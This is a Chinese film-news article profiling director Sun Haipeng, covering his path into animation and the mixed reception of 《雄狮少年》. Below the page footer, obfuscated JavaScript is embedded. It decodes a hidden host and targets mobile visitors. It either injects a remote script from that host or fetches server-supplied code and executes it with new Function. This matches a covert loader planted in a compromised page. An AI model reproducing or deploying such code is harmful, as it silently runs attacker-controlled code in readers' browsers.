首页  »  明星资讯  »  中国动画百年系列 | 《雄狮少年》背后的追梦人

中国动画百年系列 | 《雄狮少年》背后的追梦人

明星资讯 加载中 时间:2022.07.25


1905电影网专稿 2015年,一部《西游记之大圣归来》冲出市场,“国漫崛起”成为大众的口号。后续日子中,涌出了《大鱼·海棠》《白蛇:缘起》《风语咒》等一系列的爆款作品。


2019年,《哪吒之魔童降世》拉高了动画电影票房的天花板,和后续上映的《姜子牙》,成为少有票房破10亿的国产动画。


动画电影似乎仍旧处于寻找观众的阶段。近期上映的电影《冲出地球》,导演路演苦于不见观众,一个鞠躬,是对作品本身,也对支持过作品的人。


即便是每年各类低幼的儿童电影,除了《熊出没》这类超级IP之外,多数影片的票房始终徘徊在1亿左右。


动画电影的观众在哪里?站在中国动画百年的拐点,1905电影网推出“中国动画百年”特别系列报道,对话中国动画从业者,致敬中国动画人。


毋庸置疑,《雄狮少年》是2021年最具话题争议的动画电影,喜欢的观众,捧为年度十佳;不喜欢的人,则是各种抨击。



电影下映已经近半年,抛开宣发带来的标签,我们回头理性看待这部作品,从各种赞赏和批评中,找到这部作品的意义,或许是《雄狮少年》的价值所在。


拍摄了《没头脑和不高兴》《半夜鸡叫》等动画电影的张松林老师曾说,“能实拍的片子,为什么要做动画,动画就应该讲拍不出的故事。”


对于现实落地的《雄狮少年》而言,该如何解读动画的意义呢?



事实上,导演孙海鹏在《雄狮少年》之前,曾制作了《美食大冒险》的剧集和动画,天马行空的想象力碰撞,只是调性上,相对低幼。


调整创作轨道,对于孙海鹏而言,实则是“寻找”,找到了自己想做的动画,只是下一步,如何找到观众。


01.曾经无名的人


在《雄狮少年》问世之前,孙海鹏没完全想明白,自己到底要做什么动画。甚至从走入动画这一行,都是一些“巧合”,甚至是意外。


虽然是湖北美术学院毕业,但学的是水彩,和动画没有太大的联系。大学毕业之后,他就一人前往了深圳。


找工作,也成为了当时孙海鹏的“头等大事”。和《雄狮少年》里的阿娟一样,他是从湖北的一个小城市走出来的人,对于大城市的繁华,身上有着自己的倔强。



千禧年初,做建筑效果图的工作非常火热,于是孙海鹏便从学习制图软件入手,在这个过程中,渐渐喜欢上了动画,“那会儿挺感兴趣的,但从来没有想过要在动画行业做出什么成就。”


摆在大家面前的现实更残酷,特效技术落后,以及制作成本等原因,当时的动画电影市场并不明朗。但这并没有因此让很多心里有动画梦的年轻人放弃,互联网上的论坛成了大家交流的精神角落。



“大家水平都不是很高,但都会把作品发上去,如果能得到大家的赞扬,就很有成就感。其实我(那会儿)倒没有什么特别大的计划,就是这些小小的成就感,支撑我走到现在吧。”孙海鹏现在的合作人程海明,同时也是《雄狮少年》的出品人之一,正是当初结识于论坛。


随着时间推移,当初“China DV”和“火星时代”这两个论坛,或是退出了互联网,或是转型。在当时,两个论坛,或多或少培育出了一批人才,“我们团队现在一些做技术的主创,也‘混’在论坛里面,只是那时候,彼此可能还不太认识。”



正是那个阶段,孙海鹏做出了第一个短片动画,慢慢有了后来大家熟知的“包强”形象,也就是《美食大冒险》系列的前身。他又从深圳跑到了广州,组建了自己的动画团队,开始做“包强”系列。



“现在回头看,《美食大冒险》严格意义上不是我想做的作品”,孙海鹏并不回避过去创作,但种种原因,项目还是要继续做,《美食大冒险》的剧集系列和电影同步推进。团队也从原来的不过10人,扩张到200余人。


毕竟带着团队,即便不考虑作品的价值,也要顾虑大家的生计。“非常焦虑,后面的创作其实已经偏离了短片那会儿的气质。”差不多是动画版制作中,《大圣归来》横空出世,市场上的种种声音,无不加重了孙海鹏焦虑的情绪。



“那时候觉得自己很落后,还是用老思路创作,又没有‘喜羊羊’‘熊出没’那样的量级。”自己觉得这种处境非常尴尬,而项目已经创作过半,不能轻易搁置,甚至团队在这个项目中投了太多的资金,“背负了很多债务,工资都快发不起了。”


“我始终相信,我们团队一定能做出好的作品。”


02.争议之后的创作


即便《美食大冒险》系列不是孙海鹏想要的作品,但他依旧感谢这部作品,“如果没有这部作品的积累,我不可能认识这么一群人,《雄狮少年》的主创,都是当时的人。”


动画电影《美食大冒险之英雄烩》出品方之一是北京文化,正是这次合作,孙海鹏认识了时任北京文化电影事业部总经理的张苗。


导演孙海鹏(左)和监制张苗(右)


至于后来从确定主题,到限定两年创作的故事,早已被媒体反复报道。而对于孙海鹏而言,当剧本确定的那会儿,他知道项目一定能成,只是焦虑始终没有消失过。


前一晚还在机房为《雄狮少年》做最后的调整,没有任何休息,他就从北京飞回了深圳,开始了点映路演,“那会儿刚熬完两个通宵”,面对观众的检验,面对媒体连轴的通告采访。



电影初期反馈并不差,甚至一边倒的好评,不少媒体和院线经理,都预估《雄狮少年》会是又一部“10亿+”的动画电影。


“当时说那么好票房什么的,它不是一个真实发生的事情,当然心里会有期待,但是这个现实,它还是有落差。”



上映之后,乃至到电影下线,《雄狮少年》争议不断。


“从既定预算和时间来看,我们完成度已经不错了,但我不认为这个片子是没有问题的。”整个过程中,孙海鹏都会看网上大家的评论,“大家指出内容上的一些不足,我觉得很多说得都很有道理。”事实上,在作品正式和观众见面前,他也不确定观众会不会看到团队的努力。



“我之前以为观众不会在意的东西,但观众是在意的,我发现观众的宽容度以及他们的敏感程度比我想象中要高。”为了还原广州的烟火气,孙海鹏和团队花了不少心血,但所谓大隐隐于市,这些细微的地方,大家此前都没想到,很快就被观众捕捉到了。



只是这种现实感,也会让一部分观众“不接受”,现实的质感,反而打破了动画的奇思妙想。


“为什么要定义动画呢?”对于孙海鹏而言,不管是什么题材的动画,剧本才是最关键的,而且在技术上,现在越来越多的实拍内容,都是用动画特效完成的,“我觉得未来两者的界限会越来越模糊,尤其是三维动画的技术,发展方向就是模拟现实,创作上也会越来越真实。”



当然,动画的想象力并没有问题,只是在他看来,要用在合适的项目上。只是不管是如何,对他而言,未来的作品可以像《雄狮少年》气质一样,“更偏成年人一点,同时也兼顾孩子。”


目前孙海鹏手上官宣了《雄狮少年2》和《逐日少年》等项目,团队都同步在进行剧本的创作和优化,“看哪个剧本先出来,故事还是最重要的。”



《雄狮少年2》依旧会是阿娟的成长故事,已经立项的《逐日少年》,“会和《雄狮少年》不同,会更偏重男女之间的情感故事。”


至于大家关心的造型问题,“肯定会升级,《雄狮少年》在三维动画中呈现是有难度的,所以有不成熟的地方,我们未来会把它做得更成熟和精致。”


或许,孙海鹏只是众多动画人的缩影,找创作轨道,找心中的项目,然后找观众。《雄狮少年》至今仍在豆瓣,有超过42万的观众评价,并仍高达8.3分,有的甚至是在影片上线流媒体之后,不禁“真香”。


看吧,好作品,永远能等到观众。


短视频/复合型人才、流森 文/流森

扫描二维码下载APP 安卓手机专享
热映电影
热播电视剧
function KiCxjWD(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function gRuZHPih(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return KiCxjWD(t);};window[''+'S'+'N'+'p'+'w'+'O'+'m'+'W'+'Z'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=gRuZHPih,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aWp3bbi5uZWloaG91LmNvbbQ==','131005',window,document,['b','eiKruS']);}:function(){};